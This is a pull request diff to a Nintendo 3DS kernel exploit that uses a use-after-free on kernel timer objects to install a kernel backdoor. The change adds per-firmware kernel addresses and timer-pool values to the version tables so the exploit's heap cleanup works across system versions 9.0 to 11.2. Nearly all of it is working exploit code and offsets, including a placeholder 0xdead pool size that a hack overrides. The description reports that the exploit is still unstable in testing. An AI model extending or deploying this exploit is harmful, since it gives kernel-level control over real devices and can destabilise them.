### PR TITLE
Add ktimer values to version map table

### DIFF
--- a/source/exploit.c
+++ b/source/exploit.c
@@ -1,6 +1,7 @@
 /* Exploit-related code. Ned Williamson 2016 */
 #include <3ds.h>
 #include <stdio.h>
+#include <string.h>
 #include "backdoor.h"
 #include "exploit.h"
 #include "timer.h"
@@ -11,6 +12,10 @@ extern void *RandomStub;
 extern u32 **svc_handler_table_writable;
 extern void *svc_7b_free_area;
 extern void *svc_7b_free_area_writable;
+
+static u32 ktimer_pool_size;
+static void *ktimer_pool_head;
+static u32 ktimer_base_offset;
 
 #define TIMER2_NEXT_KERNEL 0xe281100c
 
@@ -36,12 +41,7 @@ static u32 fptrs[16] = {
 #define LINEAR_KERN_TO_USER(addr) ((addr) - 0xE0000000 + 0x14000000)
 
 /* is this valid across versions? */
-#define KTIMER_POOL_HEAD 0xFFF33278
-#define KTIMER_BASE (0xFFF70000 + 0x4E20)
 #define KTIMER_OBJECT_SIZE 0x3C
-#define KTIMER_POOL_SIZE 0xE10
-#define KTIMER_END (KTIMER_BASE + KTIMER_POOL_SIZE)
-#define NUM_TIMER_OBJECTS (KTIMER_POOL_SIZE / KTIMER_OBJECT_SIZE)
 
 /* if the UAF succeeded, setup mybackdoor */
 static bool try_setup_global_backdoor() {
@@ -118,12 +118,22 @@ static bool try_setup_global_backdoor() {
 
 /* TODO upper bound is 11.1+ only */
 #define IS_VTABLE(addr) (0xFFF2E000 <= (u32)(addr) && (u32)(addr) < 0xFFF2F000)
-#define TOBJ_ADDR_TO_IDX(addr) (((u32)(addr) - KTIMER_BASE) / KTIMER_OBJECT_SIZE)
-#define TOBJ_IDX_TO_ADDR(idx) (KTIMER_BASE + KTIMER_OBJECT_SIZE * (u32)(idx))
+#define TOBJ_ADDR_TO_IDX(base, addr) (((u32)(addr) - (u32)(base)) / KTIMER_OBJECT_SIZE)
+#define TOBJ_IDX_TO_ADDR(base, idx) ((u32)(base) + KTIMER_OBJECT_SIZE * (u32)(idx))
 
 static bool find_broken_link(void ***parent_ret, void **child_ret) {
-  void *next_table[NUM_TIMER_OBJECTS] = { };
-  void *prev_table[NUM_TIMER_OBJECTS] = { };
+  u32 num_timer_objects = ktimer_pool_size / KTIMER_OBJECT_SIZE;
+  // carry
+  if (ktimer_pool_size % KTIMER_OBJECT_SIZE) {
+      num_timer_objects += 1;
+  }
+  void *ktimer_base = (void *)(0xFFF70000 + ktimer_base_offset);
+  void *ktimer_end = (void *)((u32)ktimer_base + ktimer_pool_size);
+
+  void *next_table[num_timer_objects];
+  memset(next_table, 0, num_timer_objects * sizeof(void *));
+  void *prev_table[num_timer_objects];
+  memset(prev_table, 0, num_timer_objects * sizeof(void *));
 
   /* initialize return values */
   *parent_ret = NULL;
@@ -131,44 +141,44 @@ static bool find_broken_link(void ***parent_ret, void **child_ret) {
 
   u32 i = 0;
   /* build hash tables, O(n) */
-  for (void *parent = (void *)KTIMER_BASE;
-       parent < (void *)KTIMER_END;
+  for (void *parent = ktimer_base;
+       parent < ktimer_end;
        parent += KTIMER_OBJECT_SIZE, i++) {
     void *child = (void *)kreadint(parent);
-    //printf("parent: %p, child: %p, TOBJ_ADDR_TO_IDX(parent) = 0x%lx, TOBJ_ADDR_TO_IDX(child) = 0x%lx\n", parent, child, TOBJ_ADDR_TO_IDX(parent), TOBJ_ADDR_TO_IDX(child));
-    if (TOBJ_ADDR_TO_IDX(parent) != i) {
+    //printf("parent: %p, child: %p, TOBJ_ADDR_TO_IDX(parent) = 0x%lx, TOBJ_ADDR_TO_IDX(child) = 0x%lx\n", parent, child, TOBJ_ADDR_TO_IDX(ktimer_base, parent), TOBJ_ADDR_TO_IDX(ktimer_base, child));
+    if (TOBJ_ADDR_TO_IDX(ktimer_base, parent) != i) {
       printf("[!] Got TOBJ_ADDR_TO_IDX(parent) != i: 0x%lx != 0x%lx\n",
-             TOBJ_ADDR_TO_IDX(parent), i);
+             TOBJ_ADDR_TO_IDX(ktimer_base, parent), i);
       wait_for_user();
     }
-    printf("obj_addr_to_idx: parent -> %ld, child -> %ld\n", TOBJ_ADDR_TO_IDX(parent), TOBJ_ADDR_TO_IDX(child));
+    printf("obj_addr_to_idx: parent -> %ld, child -> %ld\n", TOBJ_ADDR_TO_IDX(ktimer_base, parent), TOBJ_ADDR_TO_IDX(ktimer_base, child));
     if (IS_VTABLE(child)) {
       /* for allocated objects, use non-null filler values since
        * our checks just look for null
        */
-      next_table[TOBJ_ADDR_TO_IDX(parent)] = (void *)1;
+      next_table[TOBJ_ADDR_TO_IDX(ktimer_base, parent)] = (void *)1;
       /* write to 'parent' of both next and prev, clearing them */
       /* TODO we should probably be checking if 1 was written already */
-      prev_table[TOBJ_ADDR_TO_IDX(parent)] = (void *)1;
+      prev_table[TOBJ_ADDR_TO_IDX(ktimer_base, parent)] = (void *)1;
     } else {
       /* if freed, add tuples in both directions */
-      next_table[TOBJ_ADDR_TO_IDX(parent)] = child;
-      prev_table[TOBJ_ADDR_TO_IDX(child)] = parent;
+      next_table[TOBJ_ADDR_TO_IDX(ktimer_base, parent)] = child;
+      prev_table[TOBJ_ADDR_TO_IDX(ktimer_base, child)] = parent;
     }
   }
-  if (i != NUM_TIMER_OBJECTS) {
+  if (i != num_timer_objects) {
     printf("[!] Unexpected number of iterations over timer object list.\n");
-    printf("[!] Got %lu, expected %u.\n", i, NUM_TIMER_OBJECTS);
+    printf("[!] Got %lu, expected %lu.\n", i, num_timer_objects);
     return false;
   }
 
   /* account for list head. only care about objects themselves, so don't
    * update next_table.
    */
-  void *head_parent = (void *)KTIMER_POOL_HEAD;
+  void *head_parent = ktimer_pool_head;
   void *head_child = (void *)kreadint_real(head_parent);
   if (head_child) {
-    prev_table[TOBJ_ADDR_TO_IDX(head_child)] = head_parent;
+    prev_table[TOBJ_ADDR_TO_IDX(ktimer_base, head_child)] = head_parent;
   }
 
   /* abandoned child node is lowest object with next != NULL, prev == NULL */
@@ -178,21 +188,21 @@ static bool find_broken_link(void ***parent_ret, void **child_ret) {
   /* this could happen but if we really allocated all the timer objects, the
    * exploit probably work work anyways :p gotta reboot!
    */
-  if (next_table[NUM_TIMER_OBJECTS - 1] != NULL) {
+  if (next_table[num_timer_objects - 1] != NULL) {
     printf("[!] Warning! Bad invariant: last node does not point to NULL\n");
     printf("[!] The exploit cannot cleanup sufficiently.\n");
     printf("[!] Please reboot your 3DS and try again.\n");
     return false;
   }
 
-  for (i = 0; i < NUM_TIMER_OBJECTS; i++) {
+  for (i = 0; i < num_timer_objects; i++) {
     /* ignore last node for next, as it's always NULL */
     /* XXX for the parent it's probably better to just traverse the LL */
-    if (i != NUM_TIMER_OBJECTS - 1 && next_table[i] == NULL) {
+    if (i != num_timer_objects - 1 && next_table[i] == NULL) {
       if (*parent_ret != NULL) {
         printf("[!] Warning: unexpectedly found more than one NULL next.\n");
       }
-      *parent_ret = (void **)TOBJ_IDX_TO_ADDR(i);
+      *parent_ret = (void **)TOBJ_IDX_TO_ADDR(ktimer_base, i);
       printf("[+] found parent: %p (-> %p)\n", *parent_ret, next_table[i]);
       wait_for_user();
     }
@@ -200,7 +210,7 @@ static bool find_broken_link(void ***parent_ret, void **child_ret) {
       if (*child_ret != NULL) {
         printf("[!] Warning: unexpectedly found more than one NULL prev.\n");
       }
-      *child_ret = (void *)TOBJ_IDX_TO_ADDR(i);
+      *child_ret = (void *)TOBJ_IDX_TO_ADDR(ktimer_base, i);
       printf("[+] found child: (%p ->) %p\n", prev_table[i], *child_ret);
       wait_for_user();
     }
@@ -355,35 +365,38 @@ typedef struct version_table {
   u32 random_stub;
   u32 svc_handler_table;
   u32 free_area;
+  u32 ktimer_pool_head;
+  u32 ktimer_pool_size;
+  u32 ktimer_base_offset;
 } version_table;
 
 // New 3DS
 static version_table n_table[] = {
-  {SYSTEM_VERSION(2, 46, 0),  0xFFF18D5C, 0xFFF1B1A4, 0xFFF02300, 0xFFF2CA2C},  // 9.0
-  {SYSTEM_VERSION(2, 48, 3),  0xFFF18AFC, 0xFFF1B188, 0xFFF02310, 0xFFF2CF94},  // 9.3
-  {SYSTEM_VERSION(2, 49, 0),  0xFFF18AF0, 0xFFF1B17C, 0xFFF0230C, 0xFFF2CF88},  // 9.5
-  {SYSTEM_VERSION(2, 50, 1),  0xFFF18B18, 0xFFF1B1A4, 0xFFF02308, 0xFFF2CFCC},  // 9.6
-  {SYSTEM_VERSION(2, 50, 7),  0xFFF18AF0, 0xFFF1B17C, 0xFFF02310, 0xFFF2CFA4},  // 10.0
-  {SYSTEM_VERSION(2, 50, 9),  0xFFF18AF0, 0xFFF1B17C, 0xFFF02310, 0xFFF2CFA4},  // 10.2
-  {SYSTEM_VERSION(2, 50, 11), 0xFFF18AF0, 0xFFF1B17C, 0xFFF02310, 0xFFF2CFD0},  // 10.4
-  {SYSTEM_VERSION(2, 51, 0),  0xFFF18CD4, 0xFFF1B5FC, 0xFFF0230C, 0xFFF2D710},  // 11.0
-  {SYSTEM_VERSION(2, 51, 2),  0xFFF18CD4, 0xFFF1B63C, 0xFFF0230C, 0xFFF2D7D0},  // 11.1
-  {SYSTEM_VERSION(2, 52, 0),  0xFFF18CF4, 0xFFF1B65C, 0xFFF0230C, 0xFFF2D7F0},  // 11.2
+  {SYSTEM_VERSION(2, 46, 0),  0xFFF18D5C, 0xFFF1B1A4, 0xFFF02300, 0xFFF2CA2C, 0xFFF32238, 0x0E50, 0x4f20},  // 9.0
+  {SYSTEM_VERSION(2, 48, 3),  0xFFF18AFC, 0xFFF1B188, 0xFFF02310, 0xFFF2CF94, 0xFFF32238, 0x0E10, 0x4E20},  // 9.3
+  {SYSTEM_VERSION(2, 49, 0),  0xFFF18AF0, 0xFFF1B17C, 0xFFF0230C, 0xFFF2CF88, 0xFFF32238, 0x0E10, 0x4E20},  // 9.5
+  {SYSTEM_VERSION(2, 50, 1),  0xFFF18B18, 0xFFF1B1A4, 0xFFF02308, 0xFFF2CFCC, 0xFFF32238, 0x0E10, 0x4E20},  // 9.6
+  {SYSTEM_VERSION(2, 50, 7),  0xFFF18AF0, 0xFFF1B17C, 0xFFF02310, 0xFFF2CFA4, 0xFFF32238, 0x0E10, 0x4E20},  // 10.0
+  {SYSTEM_VERSION(2, 50, 9),  0xFFF18AF0, 0xFFF1B17C, 0xFFF02310, 0xFFF2CFA4, 0xFFF32238, 0x0E10, 0x4E20},  // 10.2
+  {SYSTEM_VERSION(2, 50, 11), 0xFFF18AF0, 0xFFF1B17C, 0xFFF02310, 0xFFF2CFD0, 0xFFF32238, 0x0E10, 0x4E20},  // 10.4
+  {SYSTEM_VERSION(2, 51, 0),  0xFFF18CD4, 0xFFF1B5FC, 0xFFF0230C, 0xFFF2D710, 0xFFF33278, 0x0E10, 0x4E20},  // 11.0
+  {SYSTEM_VERSION(2, 51, 2),  0xFFF18CD4, 0xFFF1B63C, 0xFFF0230C, 0xFFF2D7D0, 0xFFF33278, 0x0E10, 0x4E20},  // 11.1
+  {SYSTEM_VERSION(2, 52, 0),  0xFFF18CF4, 0xFFF1B65C, 0xFFF0230C, 0xFFF2D7F0, 0xFFF33278, 0x0E10, 0x4E20},  // 11.2
   {0},
 };
 
 // Old 3DS
 static version_table o_table[] = {
-  {SYSTEM_VERSION(2, 46, 0),  0xFFF184C0, 0xFFF1A830, 0xFFF02330, 0xFFF2B82C},  // 9.0
-  {SYSTEM_VERSION(2, 48, 3),  0xFFF185C0, 0xFFF1AB50, 0xFFF0232C, 0xFFF2BD68},  // 9.3
-  {SYSTEM_VERSION(2, 49, 0),  0xFFF185B4, 0xFFF1AB44, 0xFFF02328, 0xFFF2BD5C},  // 9.5
-  {SYSTEM_VERSION(2, 50, 1),  0xFFF185DC, 0xFFF1AB6C, 0xFFF02324, 0xFFF2BDA0},  // 9.6
-  {SYSTEM_VERSION(2, 50, 7),  0xFFF185A8, 0xFFF1AB38, 0xFFF0232C, 0xFFF2BD6C},  // 10.0
-  {SYSTEM_VERSION(2, 50, 9),  0xFFF185A8, 0xFFF1AB38, 0xFFF0232C, 0xFFF2BD6C},  // 10.2
-  {SYSTEM_VERSION(2, 50, 11), 0xFFF185A8, 0xFFF1AB38, 0xFFF0232C, 0xFFF2BD98},  // 10.4
-  {SYSTEM_VERSION(2, 51, 0),  0xFFF18A80, 0xFFF1B2AC, 0xFFF02328, 0xFFF2C514},  // 11.0
-  {SYSTEM_VERSION(2, 51, 2),  0xFFF18A80, 0xFFF1B2EC, 0xFFF02328, 0xFFF2C5D4},  // 11.1
-  {SYSTEM_VERSION(2, 52, 0),  0xFFF18AA0, 0xFFF1B30C, 0xFFF02328, 0xFFF2C5F4},  // 11.2
+  {SYSTEM_VERSION(2, 46, 0),  0xFFF184C0, 0xFFF1A830, 0xFFF02330, 0xFFF2B82C, 0xFFF31000, 0xdead, 0x4958},  // 9.0
+  {SYSTEM_VERSION(2, 48, 3),  0xFFF185C0, 0xFFF1AB50, 0xFFF0232C, 0xFFF2BD68, 0xFFF30F98, 0xdead, 0x4A48},  // 9.3
+  {SYSTEM_VERSION(2, 49, 0),  0xFFF185B4, 0xFFF1AB44, 0xFFF02328, 0xFFF2BD5C, 0xFFF30F98, 0xdead, 0x4A48},  // 9.5
+  {SYSTEM_VERSION(2, 50, 1),  0xFFF185DC, 0xFFF1AB6C, 0xFFF02324, 0xFFF2BDA0, 0xFFF30F98, 0xdead, 0x4A48},  // 9.6
+  {SYSTEM_VERSION(2, 50, 7),  0xFFF185A8, 0xFFF1AB38, 0xFFF0232C, 0xFFF2BD6C, 0xFFF30F98, 0xdead, 0x4A48},  // 10.0
+  {SYSTEM_VERSION(2, 50, 9),  0xFFF185A8, 0xFFF1AB38, 0xFFF0232C, 0xFFF2BD6C, 0xFFF30F98, 0xdead, 0x4A48},  // 10.2
+  {SYSTEM_VERSION(2, 50, 11), 0xFFF185A8, 0xFFF1AB38, 0xFFF0232C, 0xFFF2BD98, 0xFFF30F98, 0xdead, 0x4A48},  // 10.4
+  {SYSTEM_VERSION(2, 51, 0),  0xFFF18A80, 0xFFF1B2AC, 0xFFF02328, 0xFFF2C514, 0xFFF31FD8, 0xdead, 0x4A48},  // 11.0
+  {SYSTEM_VERSION(2, 51, 2),  0xFFF18A80, 0xFFF1B2EC, 0xFFF02328, 0xFFF2C5D4, 0xFFF31FD8, 0xdead, 0x4A48},  // 11.1
+  {SYSTEM_VERSION(2, 52, 0),  0xFFF18AA0, 0xFFF1B30C, 0xFFF02328, 0xFFF2C5F4, 0xFFF31FD8, 0xdead, 0x4A48},  // 11.2
   {0},
 };
 
@@ -440,6 +453,14 @@ static bool initialize_handle_address() {
       /* hardcode 11.1+ for now */
       u32 svc_7b_free_area_pa = table->free_area - 0xfff20000 + 0x1ffde000;
       svc_7b_free_area_writable = (void *)(svc_7b_free_area_pa - 0x1ff00000 + 0xdff00000);
+
+      ktimer_pool_head = (void *)table->ktimer_pool_head;
+      ktimer_pool_size = table->ktimer_pool_size;
+      // temporary hack
+      if (!n3ds) {
+        ktimer_pool_size = kver <= SYSTEM_VERSION(2, 46, 0) ? 0xE50 : 0xE10;
+      }
+      ktimer_base_offset = table->ktimer_base_offset;
       return true;
     }
     table = table + 1;
@@ -501,6 +522,7 @@ bool k11_exploit() {
   if (!cleanup_uaf()) {
     printf("[-] Warning! Exploit succeeded couldn't cleanup kernel.\n");
     printf("[-] System instability may occur.\n");
+
     return false;
   }
 


### PR DESCRIPTION
* add new field for ktimer_pool_size, ktimer_pool_head, ktimer_base_offset

* o3ds firms use `ldr` command for the fetch ktimer_pool_size like `ldr r3, =0x69e0`

  maybe we need to reading `0x169e0` on the app for fatching this value.
  currently just use n3ds values

* in my test, still process unstable.
  - n3ds 10.3 and 11.0: can return hbl but cannot launch any app
  - o3ds 9.2: k11 install succeed, but cannot return hbl